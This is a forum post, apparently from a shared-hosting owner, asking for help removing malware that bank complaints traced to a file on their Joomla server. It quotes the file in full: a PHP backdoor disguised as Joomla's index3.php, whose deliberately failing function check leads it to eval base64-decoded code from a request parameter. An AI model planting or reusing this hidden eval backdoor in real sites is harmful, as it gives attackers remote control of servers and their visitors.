Hi 2 all
Sorry my English is not good
i have a cpanel shared hosting . my server is in xlhost dc
I've received a few BroBot Malware complaints from bank of america
xlhost find user and file hve abuse and send me user information
Malware file is a php cod whene see url on browser open joomla administrator login page
php code file. please see it
please help me to finde this file on my serverand remove it or block it
Thanks All
Sorry my English is not good
i have a cpanel shared hosting . my server is in xlhost dc
I've received a few BroBot Malware complaints from bank of america
xlhost find user and file hve abuse and send me user information
Malware file is a php cod whene see url on browser open joomla administrator login page
php code file. please see it
PHP:
<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
/**
* @version $Id: index3.php 14401 2010-01-26 14:10:00Z louis $
* @package Joomla
* @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
$_REQUEST['tmpl'] = 'component';
include('index.php');
?>
Thanks All